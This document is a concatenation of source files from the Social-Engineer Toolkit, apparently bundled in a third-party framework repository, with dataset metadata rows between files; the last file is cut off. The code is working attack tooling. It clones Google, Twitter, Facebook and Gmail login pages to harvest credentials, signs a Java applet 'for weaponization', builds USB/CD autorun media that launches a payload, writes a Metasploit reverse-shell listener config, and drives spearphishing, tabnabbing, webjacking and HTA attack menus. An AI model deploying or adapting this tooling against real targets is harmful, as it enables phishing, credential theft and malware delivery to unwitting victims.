The good news is that the process is fairly simple. All in all, it should cost roughly $300-350 to set up your
business, buy a code signing certificate, and publish an applet named whatever you want. You can also file a "DBA" (doing
business as), which is much easier.
""")
core.print_error("*** WARNING ***")
core.print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk")
core.print_error("*** WARNING ***")
# use flag is in case someone already has a code signing certificate, in
# that case it bypasses the "no" answer
use_flag = 0
print("""
[--------------------------------]
Initial Selection Process
[--------------------------------]
There are a few choices here. The first is whether you want to import your own Java applet that you have already signed. If you already have the certificate and want to use the SET applet, you can find an unsigned version under src/html/unsigned/unsigned.jar. If you want to use this menu, you can as well.
Option 1 will import your own SIGNED applet that you already have.
Option 2 will walk through either creating the code signing certificate request to submit to the CA or importing a certificate you already own. If you already have your certificate and want SET to handle the signing, this is the option you want.
1. Import your own java applet into SET (needs to be SIGNED).
2. Either create a code-signing csr or use a code-signing certificate you already own.
""")
firstprompt = input("Enter your choice [1-2]: ")
if not firstprompt:
firstprompt = "2"
# if we want to import our own java applet
if firstprompt == "1":
newpath = input("Enter the path to the .jar file: ")
if not os.path.isfile(newpath):
while True:
core.print_error("Unable to locate the file. Please try again.")
newpath = input("Enter the path to the .jar file: ")
if os.path.isfile(newpath):
break
# import into SET
core.print_status("Importing the applet into SET for weaponization...")
shutil.copyfile(newpath, os.path.join(core.userconfigpath, "Signed_Update.jar.orig"))
shutil.copyfile(newpath, os.path.join(core.userconfigpath, "Signed_Update.jar"))
core.print_status("The applet has been successfully imported into SET.")
# if we want to either generate a certificate or use our own certificate
# this is it
if firstprompt == "2":
cert_path = ""
# prompt for a different certificate
prompt = input(core.setprompt("0", "Have you already generated a code signing-certificate? [yes|no]")).lower()
# if we selected yes if we generated a code signing certificate
if prompt == "yes" or prompt == "y":
# prompt the user to import the code signing certificate
cert_path = input(core.setprompt("0", "Path to the code signing certificate file (provided by CA)"))
if not os.path.isfile(cert_path):
# loop forever
while True:
core.print_error("ERROR:Filename not found. Try again.")
# re-prompt if we didn't file the filename
cert_path = input(core.setprompt("0", "Path to the .cer certificate file"))
# if we find the filename then break out of loop
if os.path.isfile(cert_path):
break
# here is where we import the certificate
try:
core.print_info("Importing the certificate into SET...")
subprocess.Popen("keytool -import -alias MyCert -file {}".format(cert_path), shell=True).wait()
# trigger that we have our certificate already and bypass the
# request process below
use_flag = 1
# exception here in case it was already imported before
except:
pass
# this will exit the menu
if prompt == "quit" or prompt == "q":
use_flag = 0
prompt = "yes"
cert_path = ""
# if we have a cert now or if we need to generate one
if use_flag == 1 or prompt == "no" or prompt == "n":
# if we selected no we need to create one
if prompt == "no" or prompt == "n":
# get the stuff ready to do it
core.print_info("Generating the initial request for Verisign...")
# grab input from user, fqdn
answer1 = input(core.setprompt("0", "FQDN (ex. www.thisisafakecert.com)"))
            # grab the name of the organization
answer2 = input(core.setprompt("0", "Name of the organization"))
# grab two letter country code
answer3 = input(core.setprompt("0", "Two letter country code (ex. US)"))
# if blank, default to US
if not answer3:
answer3 = "US"
# grab state
answer4 = input(core.setprompt("0", "State"))
# grab city
answer5 = input(core.setprompt("0", "City"))
# generate the request crl
subprocess.Popen('keytool '
'-genkey '
'-alias MyCert '
'-keyalg RSA '
'-keysize 2048 '
'-dname "CN={a1},O={a2},C={a3},ST={a4},L={a5}"'.format(a1=answer1,
a2=answer2,
a3=answer3,
a4=answer4,
a5=answer5),
shell=True).wait()
core.print_info("Exporting the cert request to text file...")
# generate the request and export to certreq
subprocess.Popen("keytool -certreq -alias MyCert > {}".format(os.path.join(definepath, "certreq.txt")), shell=True).wait()
core.print_status("Export successful. Exported certificate under the SET root under certreq.txt")
core.print_warning("You will now need to pay for a code signing certificate through Verisign/Thawte/GoDaddy/etc.")
core.print_warning("Be sure to purchase a code signing certificate, not a normal website SSL certificate.")
core.print_info("When finished, enter the path to the .cer file below")
# cert_path is used for the certificate path when generating
cert_path = input(core.setprompt("0", "Path for the code signing certificate file (.spc file)"))
# if we can't find the filename
if not os.path.isfile(cert_path):
while True:
core.print_error("ERROR:Filename not found. Please try again.")
# re-prompt if file name doesn't exist
cert_path = input(core.setprompt("0", "Path to the .cer certificate file from Verisign"))
# if we detect file, then break out of loop
if os.path.isfile(cert_path):
break
# import the certificate
subprocess.Popen("keytool -import -alias MyCert -file {0}".format(cert_path), shell=True).wait()
# if our certificate is in the data store
if os.path.isfile(cert_path):
# sign the applet with the imported certificate
subprocess.Popen("jarsigner -signedjar Signed_Update.jar {0} MyCert".format(os.path.join(definepath, "src/html/unsigned/unsigned.jar")), shell=True).wait()
        # move the newly signed applet into the SET user configuration directory
subprocess.Popen("mv Signed_Update.jar {0}".format(os.path.join(core.userconfigpath, "Signed_Update.jar.orig")), shell=True).wait()
        # signing is complete; report status to the user
core.print_status("Java Applet is now signed and will be imported into the java applet website attack from now on...")
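# Optional sanity check, not called anywhere above: list the entries in the
# default keystore so you can confirm the MyCert alias and the imported
# code-signing certificate are present (keytool will prompt for the password).
def list_keystore_entries():
    subprocess.Popen("keytool -list -v", shell=True).wait()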
| 9,574 | Python | .py | 162 | 48.623457 | 298 | 0.618819 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,833 | template.py | CHEGEBB_africana-framework/externals/set/src/html/templates/template.py | #! /usr/bin/python3
# coding=utf-8
import os
import shutil
from src.core.setcore import *
# Py2/3 compatibility
# Python3 renamed raw_input to input
try: input = raw_input
except NameError: raw_input = input
dest = ("src/html/")
url = ("")
debug_msg(mod_name(), "entering src.html.templates.template'", 1)
#
# used for pre-defined templates
#
print("""
--------------------------------------------------------
**** Important Information ****
For templates, when a POST is initiated to harvest
credentials, you will need a site for it to redirect.
You can configure this option under:
/etc/setoolkit/set.config
Edit this file, and change HARVESTER_REDIRECT and
HARVESTER_URL to the sites you want to redirect to
after it is posted. If you do not set these, then
it will not redirect properly. This only goes for
templates.
--------------------------------------------------------""")
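# For reference, the relevant settings in /etc/setoolkit/set.config look
# roughly like this (the values are illustrative; only the option names are
# taken from the note above):
#
#   HARVESTER_REDIRECT=ON
#   HARVESTER_URL=https://www.example.com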
print("""
1. Java Required
2. Google
3. Twitter
""")
choice = raw_input(setprompt(["2"], "Select a template"))
if choice == "exit":
exit_set()
# file used for nextpage in java applet attack
# if nothing is selected
if choice == "":
choice = "1"
# if java required
if choice == "1":
if os.path.isfile("src/html/index.template"):
os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/java/index.template", "src/html/index.template")
url = ""
# if google
if choice == "2":
if os.path.isfile("src/html/index.template"):
os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/google/index.template", "src/html/index.template")
url = "http://www.google.com"
# if twitter
if choice == "3":
if os.path.isfile("src/html/index.template"):
os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/twitter/index.template", "src/html/index.template")
url = "http://www.twitter.com"
if not os.path.isdir(os.path.join(userconfigpath, "web_clone")):
os.makedirs(os.path.join(userconfigpath, "web_clone/"))
if os.path.isfile(os.path.join(userconfigpath, "web_clone/index.html")):
os.remove(os.path.join(userconfigpath, "web_clone/index.html"))
shutil.copyfile("src/html/index.template", os.path.join(userconfigpath, "web_clone/index.html"))
with open(os.path.join(userconfigpath, "site.template"), 'w') as filewrite:
filewrite.write("TEMPLATE=SELF\nURL={0}".format(url))
debug_msg(mod_name(), "exiting src.html.templates.template'", 1)
| 2,467 | Python | .py | 66 | 34.484848 | 96 | 0.684166 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,834 | autolaunch.py | CHEGEBB_africana-framework/externals/set/src/autorun/autolaunch.py | #!/usr/bin/env python3
# coding=utf-8
# simple autorun creation for set
import os
import subprocess
from time import sleep
import src.core.setcore as core
# define metasploit path
definepath = os.getcwd()
msf_path = core.meta_path()
me = core.mod_name()
autorun_path = os.path.join(core.userconfigpath, "autorun")
trigger = 0
if core.check_options("INFECTION_MEDIA=") == "ON":
trigger = 1
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {2} 1> /dev/null 2> /dev/null".format(autorun_path,
os.path.join(core.userconfigpath, "payload.exe"),
os.path.join(autorun_path, "program.exe")),
shell=True).wait()
if os.path.isfile(os.path.join(core.userconfigpath, "fileformat.file")):
trigger = 2
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {0} 1> /dev/null 2>/dev/null".format(autorun_path,
os.path.join(core.userconfigpath, "template.pdf")),
shell=True).wait()
if os.path.isfile(os.path.join(core.userconfigpath, "dll/openthis.wab")):
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {0} 1> /dev/null 2> /dev/null".format(autorun_path,
os.path.join(core.userconfigpath, "dll/*")),
shell=True).wait()
trigger = 3
if not os.path.isdir(autorun_path):
os.makedirs(autorun_path)
with open(os.path.join(autorun_path, "autorun.inf"), 'w') as filewrite:
# if using standard payloads
if trigger == 1:
payload = "program.exe" # "" + alpha_data + "\""
# if using pdf payload
elif trigger == 2:
payload = "template.pdf"
elif trigger == 3:
payload = "openthis.wab"
else:
payload = ""
filewrite.write("""[autorun]\nopen={0}\nicon=autorun.ico""".format(payload))
core.print_status("Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
core.print_status("Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")
# if we want to launch payload and automatically create listener
if trigger in [1, 2, 3]:
choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]")
if choice1.lower() == "yes" or choice1.lower() == "y":
# if we used something to create other than solo.py then write out the
# listener
if not os.path.isfile(os.path.join(core.userconfigpath, "meta_config")):
with open(os.path.join(core.userconfigpath, "meta_config"), 'w') as filewrite, \
open(os.path.join(core.userconfigpath, "payload.options")) as fileopen:
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload {0}\n".format(line[0]))
filewrite.write("set lhost {0}\n".format(line[1]))
filewrite.write("set lport {0}\n".format(line[2]))
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
# create the listener
core.print_status("Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.userconfigpath, "meta_config")),
shell=True).wait()
else:
core.print_warning("cancelling...")
sleep(2)
| 4,064 | Python | .py | 77 | 40.194805 | 117 | 0.564593 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,835 | webserver.py | CHEGEBB_africana-framework/externals/set/src/core/webserver.py | import http.server
import http.client
import os
import sys
from src.core.setcore import *
# specify the web port
web_port = check_config("WEB_PORT=")
class StoppableHttpRequestHandler(http.server.SimpleHTTPRequestHandler):
"""http request handler with QUIT stopping the server"""
def do_QUIT(self):
"""send 200 OK response, and set server.stop to True"""
self.send_response(200)
self.end_headers()
self.server.stop = True
def do_POST(self):
        # POST parameters could also be processed here; for now POSTs are handled the same way as GETs.
self.do_GET()
def send_head(self):
        # This is adapted directly from SimpleHTTPRequestHandler.send_head().
"""Common code for GET and HEAD commands.
This sends the response code and MIME headers.
Return value is either a file object (which has to be copied
to the outputfile by the caller unless the command was HEAD,
and must be closed by the caller under all circumstances), or
None, in which case the caller has nothing further to do.
"""
path = self.translate_path(self.path)
f = None
if os.path.isdir(path):
if not self.path.endswith('/'):
# redirect browser - doing basically what apache does
self.send_response(301)
self.send_header("Location", self.path + "/")
self.end_headers()
return None
for index in "index.html", "index.htm":
index = os.path.join(path, index)
if os.path.exists(index):
path = index
break
else:
return self.list_directory(path)
ctype = self.guess_type(path)
        # always open in binary mode; the handler copies the raw bytes to the socket
        try:
            f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found")
return None
self.send_response(200)
self.send_header("Content-type", ctype)
fs = os.fstat(f.fileno())
self.send_header("Content-Length", str(fs[6]))
self.send_header("Last-Modified", self.date_time_string(fs.st_mtime))
self.end_headers()
return f
class StoppableHttpServer(http.server.HTTPServer):
"""http server that reacts to self.stop flag"""
def serve_forever(self):
"""Handle one request at a time until stopped."""
self.stop = False
while not self.stop:
self.handle_request()
# stop the http server
def stop_server(web_port):
    """Send a QUIT request to the http server running on localhost:<web_port>."""
    try:
        web_port = int(web_port)
        conn = http.client.HTTPConnection("localhost:%d" % web_port)
        conn.request("QUIT", "/")
        conn.getresponse()
    except: pass
# start the http server
def start_server(web_port, path):
try:
os.chdir(path)
web_port = int(web_port)
server = StoppableHttpServer(('', web_port), StoppableHttpRequestHandler)
server.serve_forever()
except: pass
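# Minimal usage sketch (not part of SET's normal flow): serve a directory on an
# assumed port in a background thread, then shut it down again by sending the
# custom QUIT verb that StoppableHttpRequestHandler understands.
if __name__ == "__main__":
    import threading
    import time
    demo_port = 8080  # illustrative; SET normally uses WEB_PORT= from set.config
    worker = threading.Thread(target=start_server, args=(demo_port, "."))
    worker.start()
    time.sleep(1)  # give the server a moment to bind
    # ...content would be browsable on http://localhost:8080/ here...
    stop_server(demo_port)
    worker.join()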
| 3,201 | Python | .py | 85 | 28.823529 | 81 | 0.611541 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,836 | module_handler.py | CHEGEBB_africana-framework/externals/set/src/core/module_handler.py | #!/usr/bin/env python3
# module_handler.py
import glob
import re
import sys
from src.core.setcore import *

# Py2/3 compatibility: Python 3 removed raw_input
try:
    raw_input
except NameError:
    raw_input = input
# this is just if the user wants to return to menu
menu_return = "false"
# base counter to identify numbers
counter = 0
# get the menu going
print("\n")
print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.")
print_info_spaces(
"Please read the readme/modules.txt for information on how to create your own modules.\n")
for name in glob.glob("modules/*.py"):
counter = counter + 1
fileopen = open(name, "r")
for line in fileopen:
line = line.rstrip()
match = re.search("MAIN=", line)
if match:
line = line.replace('MAIN="', "")
line = line.replace('"', "")
line = " " + str(counter) + ". " + line
print(line)
print("\n 0. Return to the previous menu\n")
choice = raw_input(setprompt(["9"], ""))
if choice == 'exit':
exit_set()
if choice == '0':
menu_return = "true"
# throw error if not integer
try:
choice = int(choice)
except:
print_warning("An integer was not used try again")
choice = raw_input(setprompt(["9"], ""))
# start a new counter to match choice
counter = 0
if menu_return == "false":
# pull any files in the modules directory that starts with .py
for name in glob.glob("modules/*.py"):
counter = counter + 1
if counter == int(choice):
# get rid of .modules extension
name = name.replace("modules/", "")
# get rid of .py extension
name = name.replace(".py", "")
# changes our system path to modules so we can import the files
sys.path.append("modules/")
# this will import the third party module
try:
exec("import " + name)
except:
pass
# this will call the main() function inside the python file
# if it doesn't exist it will still continue just throw a warning
try:
exec("%s.main()" % (name))
# handle the exception if main isn't there
except Exception as e:
raw_input(" [!] There was an issue with a module: %s." % (e))
return_continue()
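# For reference, a minimal third-party module that the loop above will pick up.
# Only the MAIN= line and a main() function are required by this loader; the
# name and text below are illustrative. Save it as modules/example_module.py:
#
#   MAIN="Example third-party module that just prints a message"
#
#   def main():
#       print("Hello from a custom SET module")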
| 2,277 | Python | .py | 64 | 28.359375 | 94 | 0.595444 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,837 | set.py | CHEGEBB_africana-framework/externals/set/src/core/set.py | #!/usr/bin/env python3
#
#
# The Social-Engineer Toolkit
# Written by: David Kennedy (ReL1K)
#
#
import shutil
import os
import time
import re
import sys
import socket
from src.core.setcore import *
from src.core.menu import text
try:
raw_input
except:
raw_input = input
ipaddr = ""
me = mod_name()
#
# Define path and set it to the SET root dir
#
definepath = os.getcwd()
sys.path.append(definepath)
#
# ROOT CHECK
#
# grab the operating system
operating_system = check_os()
# grab metasploit path
msf_path = meta_path()
if operating_system == "posix":
if os.geteuid() != 0:
print(
"\n The Social-Engineer Toolkit (SET) - by David Kennedy (ReL1K)")
print(
"\n Not running as root. \n\nExiting the Social-Engineer Toolkit (SET).\n")
sys.exit(1)
define_version = get_version()
try:
while 1:
show_banner(define_version, '1')
#
# USER INPUT: SHOW MAIN MENU #
#
debug_msg(me, "printing 'text.main'", 5)
show_main_menu = create_menu(text.main_text, text.main)
# special case of list item 0
print('\n 0) Return back to the main menu.\n')
main_menu_choice = (raw_input(setprompt("0", "")))
if main_menu_choice == 'exit':
break
if operating_system == "windows" or msf_path == False:
if main_menu_choice == "1" or main_menu_choice == "4" or main_menu_choice == "8" or main_menu_choice == "3":
print_warning(
"Sorry. This feature is not yet supported in Windows or Metasploit was not found.")
return_continue()
break
if main_menu_choice == '1': # 'Spearphishing Attack Vectors
while 1:
#
# USER INPUT: SHOW SPEARPHISH MENU #
#
if operating_system != "windows":
debug_msg(me, "printing 'text.spearphish_menu'", 5)
show_spearphish_menu = create_menu(
text.spearphish_text, text.spearphish_menu)
spearphish_menu_choice = raw_input(setprompt(["1"], ""))
if spearphish_menu_choice == 'exit':
exit_set()
if spearphish_menu_choice == 'help':
print(text.spearphish_text)
# Spearphish menu choice 1: Perform a Mass Email Attack
if spearphish_menu_choice == '1':
sys.path.append(definepath + "/src/core/msf_attacks/")
debug_msg(
me, "importing 'src.core.msf_attacks.create_payload'", 1)
try:
module_reload(create_payload)
except:
pass
import create_payload
# Spearphish menu choice 2: Create a FileFormat Payload
if spearphish_menu_choice == '2':
sys.path.append(definepath + "/src/core/msf_attacks/")
debug_msg(
me, "importing 'src.core.msf_attacks.create_payload'", 1)
try:
reload(create_payload)
except:
import create_payload
# Spearphish menu choice 3: Create a Social-Engineering
# Template
if spearphish_menu_choice == '3':
debug_msg(
me, "calling function 'custom_template' from 'src.core.setcore'", 3)
custom_template()
# Spearphish menu choice 0
if spearphish_menu_choice == '0':
break
#
# Web Attack Menu
#
# Main Menu choice 2: Website Attack Vectors
if main_menu_choice == '2':
while 1:
#
# USER INPUT: SHOW WEB ATTACK MENU #
#
debug_msg(me, "printing 'text.webattack_menu'", 5)
show_webattack_menu = create_menu(
text.webattack_text, text.webattack_menu)
attack_vector = raw_input(setprompt(["2"], ""))
choice3 = ""
if attack_vector == 'exit':
exit_set()
if attack_vector == "":
debug_msg(
me, "no attack vector entered, defaulting to '1) Java Applet Attack Method'", 3)
attack_vector = "1"
# check unsupported features
if operating_system == "windows" or msf_path == False:
if attack_vector == "2" or attack_vector == "9":
print_warning(
"Sorry. This option is not yet available in Windows or Metasploit was not found.")
return_continue()
break
# Web Attack menu choice 9: Return to the Previous Menu
if attack_vector == '0':
break
try:
attack_check = int(attack_vector)
except:
print_error("ERROR:Invalid selection, going back to menu.")
break
if attack_check > 9:
print_warning("Invalid option")
return_continue()
break
#
# HTA ATTACK VECTOR METHOD HERE
#
# if attack_vector == '8':
# assign HTA attack vector - do more later
# attack_vector = "hta"
# Removed to delete MLITM
#if attack_vector != "0000":
#
# USER INPUT: SHOW WEB ATTACK VECTORS MENU #
#
#if attack_vector != "7":
debug_msg(me, "printing 'text.webattack_vectors_menu'", 5)
show_webvectors_menu = create_menu(text.webattack_vectors_text, text.webattack_vectors_menu)
print(' 0) Return to Webattack Menu\n')
choice3 = raw_input(setprompt(["2"], ""))
if choice3 == 'exit':
exit_set()
if choice3 == "0":
break
if choice3 == "quit" or choice3 == '4':
break
try:
# write our attack vector to file to be called later
filewrite = open(userconfigpath + "attack_vector", "w")
# webjacking and web templates are not allowed
if attack_vector == "5" and choice3 == "1":
print(bcolors.RED + "\n Sorry, you can't use the Web Jacking vector with Web Templates." + bcolors.ENDC)
return_continue()
break
# if we select multiattack, web templates are not allowed
if attack_vector == "6" and choice3 == "1":
print(bcolors.RED + "\n Sorry, you can't use the Multi-Attack vector with Web Templates." + bcolors.ENDC)
return_continue()
break
# if we select web template and tabnabbing, throw this
# error and bomb out to menu
if attack_vector == "4" and choice3 == "1":
print(bcolors.RED + "\n Sorry, you can only use the cloner option with the tabnabbing method." + bcolors.ENDC)
return_continue()
break
# if attack vector is default or 1 for java applet
if attack_vector == '':
attack_vector = '1'
# specify java applet attack
if attack_vector == '1':
attack_vector = "java"
filewrite.write(attack_vector)
filewrite.close()
# specify browser exploits
if attack_vector == '2':
attack_vector = "browser"
filewrite.write(attack_vector)
filewrite.close()
if attack_vector == '':
attack_vector = '3'
# specify web harvester method
if attack_vector == '3':
attack_vector = "harvester"
filewrite.write(attack_vector)
filewrite.close()
print_info("Credential harvester will allow you to utilize the clone capabilities within SET")
print_info("to harvest credentials or parameters from a website as well as place them into a report")
# specify tab nabbing attack vector
if attack_vector == '4':
attack_vector = "tabnabbing"
filewrite.write(attack_vector)
filewrite.close()
# specify webjacking attack vector
if attack_vector == "5":
attack_vector = "webjacking"
filewrite.write(attack_vector)
filewrite.close()
# specify Multi-Attack Vector
attack_vector_multi = ""
if attack_vector == '6':
# trigger the multiattack flag in SET
attack_vector = "multiattack"
# write the attack vector to file
filewrite.write(attack_vector)
filewrite.close()
# hta attack vector
if attack_vector == '7':
# call hta attack vector
attack_vector = "hta"
filewrite.write(attack_vector)
filewrite.close()
# pull ip address
if choice3 != "-1":
fileopen = open(
"/etc/setoolkit/set.config", "r").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("AUTO_DETECT=ON", line)
if match:
try:
ipaddr = socket.socket(
socket.AF_INET, socket.SOCK_DGRAM)
ipaddr.connect(('google.com', 0))
ipaddr.settimeout(2)
ipaddr = ipaddr.getsockname()[0]
update_options("IPADDR=" + ipaddr)
except Exception as error:
log(error)
ipaddr = raw_input(
setprompt(["2"], "Your interface IP Address"))
update_options("IPADDR=" + ipaddr)
# if AUTO_DETECT=OFF prompt for IP Address
for line in fileopen:
line = line.rstrip()
match = re.search("AUTO_DETECT=OFF", line)
if match:
if attack_vector != "harvester":
if attack_vector != "tabnabbing":
if attack_vector != "webjacking":
if attack_vector != "hta":
# this part is to determine if NAT/port forwarding is used
# if it is it'll prompt for
# additional questions
print_info("NAT/Port Forwarding can be used in the cases where your SET machine is")
print_info("not externally exposed and may be a different IP address than your reverse listener.")
nat_or_fwd = yesno_prompt('0', 'Are you using NAT/Port Forwarding [yes|no]')
if nat_or_fwd == "YES":
ipquestion = raw_input(setprompt(["2"], "IP address to SET web server (this could be your external IP or hostname)"))
filewrite2 = open(userconfigpath + "interface", "w")
filewrite2.write(ipquestion)
filewrite2.close()
# is your payload/listener
# on a different IP?
natquestion = yesno_prompt(["2"], "Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]")
if natquestion == 'YES':
ipaddr = raw_input(setprompt(["2"], "IP address for the reverse handler (reverse payload)"))
if natquestion == "NO":
ipaddr = ipquestion
# if you arent using NAT/Port
# FWD
if nat_or_fwd == "NO":
ipaddr = grab_ipaddress()
if attack_vector == "harvester" or attack_vector == "tabnabbing" or attack_vector == "webjacking":
print("""
-------------------------------------------------------------------------------
--- * IMPORTANT * READ THIS BEFORE ENTERING IN THE IP ADDRESS * IMPORTANT * ---
The way that this works is by cloning a site and looking for form fields to
rewrite. If the POST fields are not usual methods for posting forms this
could fail. If it does, you can always save the HTML, rewrite the forms to
be standard forms and use the "IMPORT" feature. Additionally, really
important:
If you are using an EXTERNAL IP ADDRESS, you need to place the EXTERNAL
IP address below, not your NAT address. Additionally, if you don't know
basic networking concepts, and you have a private IP address, you will
need to do port forwarding to your NAT IP address from your external IP
                                address. A browser doesn't know how to communicate with a private IP
                                address, so if you don't specify an external IP address when you are using
                                this from an external perspective, it will not work. This isn't a SET issue;
this is how networking works.
""")
try:
revipaddr = detect_public_ip()
ipaddr = raw_input(setprompt(["2"], "IP address for the POST back in Harvester/Tabnabbing [" + revipaddr + "]"))
if ipaddr == "": ipaddr=revipaddr
except Exception:
rhost = raw_input("Enter the IP address for POST back in Harvester/Tabnabbing: ")
ipaddr = rhost
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
update_options("IPADDR=" + ipaddr)
else:
if ipaddr != "":
update_options("IPADDR=" + ipaddr)
# if java applet attack
if attack_vector == "java":
applet_choice()
# Select SET quick setup
if choice3 == '1':
# get the template ready
sys.path.append(definepath + "/src/html/templates")
debug_msg(me, "importing src.html.templates.template'", 1)
try:
module_reload(template)
except:
import template
# grab browser exploit selection
if attack_vector == "browser":
# grab clientattack
sys.path.append(
definepath + "/src/webattack/browser_exploits")
debug_msg(me, "line 357: importing 'src.webattack.browser_exploits.gen_payload'", 1)
try:
module_reload(gen_payload)
except:
import gen_payload
# arp cache attack, will exit quickly
# if not in config file
sys.path.append(definepath + "/src/core/arp_cache")
debug_msg(me, "line 364: importing 'src.core.arp_cache.arp'", 1)
try:
module_reload(arp)
except:
import arp
# actual website attack here
# web_server.py is main core
sys.path.append(definepath + "/src/html/")
# clean up stale file
if os.path.isfile(userconfigpath + "cloner.failed"):
os.remove(userconfigpath + "cloner.failed")
site_cloned = True
debug_msg(me, "line 375: importing 'src.webattack.web_clone.cloner'", 1)
try:
module_reload(src.webattack.web_clone.cloner)
except:
import src.webattack.web_clone.cloner
# grab java applet attack
if attack_vector == "java":
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
try:
module_reload(src.core.payloadgen.create_payloads)
except:
import src.core.payloadgen.create_payloads
if os.path.isfile(userconfigpath + "cloner.failed"):
site_cloned = False
if site_cloned == True:
# cred harvester for auto site here
if attack_vector == "harvester" or attack_vector == "tabnabbing" or attack_vector == "webjacking":
if attack_vector == "tabnabbing" or attack_vector == "webjacking":
debug_msg(
me, "importing 'src.webattack.tabnabbing.tabnabbing'", 1)
try:
module_reload(src.webattack.tabnabbing)
except:
import src.webattack.tabnabbing
# start web cred harvester here
debug_msg(
me, "importing 'src.webattack.harvester.harvester'", 1)
sys.path.append(
definepath + "/src/webattack/harvester/")
try:
module_reload(harvester)
except:
import harvester
# if we are using profiler lets prep everything to
# get ready
if attack_vector == "profiler":
from src.webattack.profiler.webprofiler import *
prep_website()
# launch HTA attack vector after the website has
# been cloned
if attack_vector == "hta":
# launch HTA attack vector after the website
# has been cloned
from src.webattack.hta.main import *
# update config
update_options("ATTACK_VECTOR=HTA")
gen_hta_cool_stuff()
attack_vector = "hta"
print_status("Automatically starting Apache for you...")
subprocess.Popen("service apache2 start", shell=True).wait()
if attack_vector != "harvester":
if attack_vector != "tabnabbing":
if attack_vector != "multiattack":
if attack_vector != "webjacking":
if attack_vector != "multiattack":
if attack_vector != "profiler":
if attack_vector != "hta":
# spawn web server here
debug_msg(
me, "importing 'src.html.spawn'", 1)
import src.html.spawn
# multi attack vector here
if attack_vector == "multiattack":
if choice3 == "1":
try:
filewrite = open(
"src/progam_junk/multiattack.template", "w")
filewrite.write("TEMPLATE=TRUE")
filewrite.close()
except:
pass
debug_msg(
me, "importing 'src.webattack.multi_attack.multiattack'", 1)
import src.webattack.multi_attack.multiattack
# Create a website clone
if choice3 == '2':
# flag that we want a custom website
definepath = os.getcwd()
sys.path.append(
definepath + "/src/webattack/web_clone/")
if os.path.isfile(userconfigpath + "site.template"):
os.remove(userconfigpath + "site.template")
filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("TEMPLATE=CUSTOM")
print_info("SET supports both HTTP and HTTPS")
# specify the site to clone
print_info("Example: http://www.thisisafakesite.com")
URL = raw_input(
setprompt(["2"], "Enter the url to clone"))
match = re.search("http://", URL)
match1 = re.search("https://", URL)
if not match:
if not match1:
URL = ("http://" + URL)
match2 = re.search("facebook.com", URL)
if match2:
URL = ("https://login.facebook.com/login.php")
# changed based on new landing page for gmail.com
match3 = re.search("gmail.com", URL)
if match3:
URL = ("https://accounts.google.com")
filewrite.write("\nURL=%s" % (URL))
filewrite.close()
# launch HTA attack vector after the website has been
# cloned
if attack_vector == "hta":
# launch HTA attack vector after the website has
# been cloned
from src.webattack.hta.main import *
# update config
update_options("ATTACK_VECTOR=HTA")
gen_hta_cool_stuff()
attack_vector = "hta"
print_status(
"Automatically starting Apache for you...")
subprocess.Popen(
"service apache2 start", shell=True).wait()
# grab browser exploit selection
if attack_vector == "browser":
# grab clientattack
sys.path.append(
definepath + "/src/webattack/browser_exploits")
debug_msg(
me, "importing 'src.webattack.browser_exploits.gen_payload'", 1)
try:
module_reload(gen_payload)
except:
import gen_payload
# set site cloner to true
site_cloned = True
if attack_vector != "multiattack":
# import our website cloner
site_cloned = True
debug_msg(
me, "importing 'src.webattack.web_clone.cloner'", 1)
try:
module_reload(src.webattack.web_clone.cloner)
except:
import src.webattack.web_clone.cloner
if os.path.isfile(userconfigpath + "cloner.failed"):
site_cloned = False
if site_cloned == True:
if attack_vector == "java":
# import our payload generator
debug_msg(
me, "importing 'src.core.payloadgen.create_payloads'", 1)
try:
module_reload(
src.core.payloadgen.create_payloads)
except:
import src.core.payloadgen.create_payloads
# arp cache if applicable
definepath = os.getcwd()
sys.path.append(definepath + "/src/core/arp_cache")
debug_msg(
me, "line 500: importing 'src.core.arp_cache.arp'", 1)
try:
module_reload(arp)
except:
import arp
# tabnabbing and harvester selection here
if attack_vector == "harvester" or attack_vector == "tabnabbing" or attack_vector == "webjacking":
if attack_vector == "tabnabbing" or attack_vector == "webjacking":
sys.path.append(
definepath + "/src/webattack/tabnabbing")
debug_msg(
me, "importing 'src.webattack.tabnabbing.tabnabbing'", 1)
try:
module_reload(tabnabbing)
except:
import tabnabbing
sys.path.append(
definepath + "/src/webattack/harvester")
debug_msg(
